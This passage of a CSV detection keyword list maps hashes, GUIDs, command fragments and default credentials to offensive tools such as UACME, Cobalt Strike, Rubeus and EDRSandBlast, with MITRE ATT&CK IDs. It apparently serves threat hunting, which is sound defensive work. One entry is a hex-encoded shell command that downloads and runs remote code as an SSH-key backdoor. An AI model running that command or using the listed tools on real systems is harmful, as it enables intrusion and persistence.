+"*5a6e7d5c10789763b0b06442dbc7f723f8ea9aec1402abedf439c6801a8d86f2*","greyware_tool_keyword","xmrig","CPU/GPU cryptominer often used by attackers on compromised machines","T1496 - T1057","TA0004 - TA0007","N/A","N/A","Cryptomining","https://github.com/xmrig/xmrig/","1","0","N/A","9","10","7770","3472","2023-09-29T12:15:29Z","2017-04-15T05:57:53Z" +"*5A6F942E-888A-4CE1-A6FB-1AB8AE22AFFA*","offensive_tool_keyword","StackCrypt","Create a new thread that will suspend every thread and encrypt its stack then going to sleep then decrypt the stacks and resume threads","T1027 - T1055.004 - T1486","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/StackCrypt","1","0","N/A","9","2","144","23","2023-08-02T02:25:12Z","2023-04-26T03:24:56Z" +"*5adad6349711b6f30ce8f37c24b7db4201c2002b7b2fec5093f81e1c3c50761f*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b20f14c3b8322a354bf374d9cb463359c57d07f4031d788c7bc88bda6f833ee*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5b5b20242873746174202d632559202f62696e2f73682920213d20242873746174202d632559202e73736829205d5d202626207b203a3b746f756368202d72202f62696e2f7368202e7373683b6578706f7274204b45593d22223b62617368202d63202224286375726c202d6673534c207468632e6f72672f737368782922*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*5c96d6754fab5329173536f2a4b29997c1661927f28b9ddcb091e4652e0bb014*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5d1fc31a7caf39f1c766e15fb64d44f1417d3b6f2fe389f3e104218050c3746a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*5dec1cfe7c0c2ec55c17fb44b43f7d14*","offensive_tool_keyword","spellbound","Spellbound is a C2 (Command and Control) framework meant for creating a botnet. ","T1105 - T1132 - T1059.003 - T1043 - T1094 - T1005","TA0011 - TA0009 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhuzaifi0604/spellbound","1","0","N/A","10","10","37","3","2023-09-22T10:52:53Z","2023-09-19T14:45:15Z" +"*5E0812A9-C727-44F3-A2E3-8286CDC3ED4F*","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","1","81","13","2023-10-03T23:06:53Z","2023-10-02T20:49:22Z" +"*5E8106A6F89B053ED91C723D5D4CAE3FFC15F1CE*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" +"*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*5e98194a01c6b48fa582a6a9fcbb92d6*","offensive_tool_keyword","cobaltstrike","CobaltStrike4.4 one-click deployment script Randomly generate passwords. keys. port numbers. certificates. etc.. to solve the problem that cs4.x cannot run on Linux and report errors Gray often ginkgo design","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/AlphabugX/csOnvps","1","1","N/A","10","10","277","68","2022-03-19T00:10:03Z","2021-12-02T02:10:42Z" +"*5F4DC47F-7819-4528-9C16-C88F1BE97EC5*","offensive_tool_keyword","SspiUacBypass","Bypassing UAC with SSPI Datagram Contexts","T1548.002","TA0004","N/A","N/A","Defense Evasion","https://github.com/antonioCoco/SspiUacBypass","1","0","N/A","10","2","183","27","2023-09-24T17:33:25Z","2023-09-14T20:59:22Z" +"*5spider:password1234*","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","4898","745","2023-10-04T21:22:20Z","2022-09-11T13:21:16Z" +"*60f19c6b805801e13824c4d9d44748da8245cd936971411d3d36b873121888eb*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","0","N/A","10","5","485","87","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" +"*61CE6716-E619-483C-B535-8694F7617548*","offensive_tool_keyword","RoguePotato","Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RoguePotato","1","0","N/A","10","9","877","125","2021-01-09T20:43:07Z","2020-05-10T17:38:28Z" +"*6290ab47924ca529c75a3598e7fe6ccf121f1aac4eb7035bf65895cbab9c6ab0*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*62cb177a65b5ac7e84d6619e16004424182d79c5f5f3dbc5f40c15f63aa089fa*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*639EF517-FCFC-408E-9500-71F0DC0458DB*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*-64 -format=reflective-dll *","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tools","https://github.com/phra/PEzor","1","0","N/A","10","10","1581","306","2023-09-26T14:00:33Z","2020-07-22T09:45:52Z" +"*6563686f2048656c6c6f204261636b646f6f72*","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","N/A","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","N/A","10","9","N/A","N/A","N/A","N/A" +"*658C8B7F-3664-4A95-9572-A3E5871DFC06*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*66e0681a500c726ed52e5ea9423d2654*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","3454","711","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" +"*695f6fc13c134fb9506720ff19b403a4cbeab39888c7eaaebc1adc51ed23881a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6973A4710FD88D32D47F4523E7EC098EF407F8ECED4B34AF6D3759CE1696EF19*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*6b95cd81ca4f309ac9f243ae73d2e8099634aaffead5b7b214bfcd14b6d604f6*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*6BF82CF9845C649557FC02D1E3D0B6A9FB4F827CC7815BF477DD0CB51246DA45*","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","AD Enumeration","https://github.com/canix1/ADACLScanner","1","0","N/A","7","9","809","151","2023-09-12T21:35:21Z","2017-04-06T12:28:37Z" +"*6c1434ff461372f8c6458ef072a32da96fc76f69f97f46fd975742b2ab5baa13*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6CAFC0C6-A428-4D30-A9F9-700E829FEA51*","offensive_tool_keyword","powersploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","1","N/A","10","10","10981","4550","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" +"*6d40ed8b3a8d33fcfff627ead344afb1fda7f76099cb8ee4135ff1c8216e94f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6e537702f0e29ddd6c134a1020396f42c30cd69da213d3fddfa645fc77c2449d*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*6e738ced2705ddee02d2040d9c7c0b9e57e16758f44faa0d855975f1b5b6d3d5*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*6e7645c4-32c5-4fe3-aabf-e94c2f4370e7*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*6F99CB40-8FEF-4B63-A35D-9CEEC71F7B5F*","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","6","575","94","2023-10-02T03:31:07Z","2021-12-28T13:14:25Z" +"*7.exe a -mx3 ad.7z ad_*.txt*","offensive_tool_keyword","7zip","7zip command to zip results from adfind scans. attackers perform Active Directory collection using AdFind in batch scriptsfrom C:\Windows\Temp\adf\ or C:\temp\ and store output in CSV files","T1074.001 - T1083 - T1560.001 - T1105","TA0003 - TA0007 - TA0009","N/A","N/A","Exploitation tools","http://www.joeware.net/freetools/tools/adfind/index.htm","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*70527328-DCEC-4BA7-9958-B5BC3E48CE99*","offensive_tool_keyword","Shellcode-Hide","simple shellcode Loader - Encoders (base64 - custom - UUID - IPv4 - MAC) - Encryptors (AES) - Fileless Loader (Winhttp socket)","T1059.003 - T1027 - T1132 - T1027.002 - T1045 - T1027.004 - T1105","TA0005 - TA0001 - TA0003","N/A","N/A","Defense Evasion","https://github.com/TheD1rkMtr/Shellcode-Hide","1","0","N/A","9","3","297","76","2023-08-02T02:22:20Z","2023-02-05T17:31:43Z" +"*713724C3-2367-49FA-B03F-AB4B336FB405*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","0","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*7180e3ad80a06a52e84d9b530b7a27016f7dd20842d832726c96366e399ee85a*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*73948912-CEBD-48ED-85E2-85FCD1D4F560*","offensive_tool_keyword","DueDLLigence","Shellcode runner framework for application whitelisting bypasses and DLL side-loading","T1055.012 - T1218.011","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/mandiant/DueDLLigence","1","0","N/A","10","5","442","90","2023-06-02T14:24:43Z","2019-10-04T18:34:27Z" +"*73d30bd3b8d21a552b8b0c00a7412120db13b3ce0ce8884ed270842863b01a36*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*73e735426c5fab97a7289a7a57bc8bb21bce7b2b1995ae076c41027780ed88c9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7443/new/payloads*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*750326700ffeeac7f34aa111af345fec1c221f519347e57e35b96454fcc044f6*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7565529119639cd275dc65b5290ad98bf4f4178f98d0b55368d337227c9ef085*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*76FFA92B-429B-4865-970D-4E7678AC34EA*","offensive_tool_keyword","SharpDomainSpray","Basic password spraying tool for internal tests and red teaming","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/HunnicCyber/SharpDomainSpray","1","0","N/A","10","1","91","18","2020-03-21T09:17:48Z","2019-06-05T10:47:05Z" +"*77b78b6e16972c318fcbba39976858787cc31038f82952d2a94f844f5847a61e*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","0","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*785ca1f83eab4185774f140b74d30823a69dec01ca06ccba4bfd8d1ddd3255d9*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*789CF3CBCC0DC849CC2B51703652084E2D2A4B2D02003B5C0650*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z" +"*79F54747-048D-4FD6-AEF4-7B098F923FD8*","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","257","31","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" +"*7be72ada31cc042e7dea712308f59235516a6ae1d434b24645cd4726a12b5d64*","offensive_tool_keyword","UACME","Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.","T1548 - T1547 - T1218","TA0002 - TA0007","N/A","N/A","Exploitation tools","https://github.com/hfiref0x/UACME","1","0","N/A","N/A","10","5488","1278","2023-09-29T15:02:03Z","2015-03-28T12:04:33Z" +"*7CFC52.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*7CFC52CD3F.dll*","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","10","10","553","114","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z" +"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1117","224","2023-09-22T14:18:21Z","2021-11-02T15:02:42Z" +"*7E3E2ECE-D1EB-43C6-8C83-B52B7571954B*","offensive_tool_keyword","EDRSandblast-GodFault","Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/gabriellandau/EDRSandblast-GodFault","1","0","N/A","10","2","183","35","2023-08-28T18:14:20Z","2023-06-01T19:32:09Z" +"*7E47D586-DDC6-4382-848C-5CF0798084E1*","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long 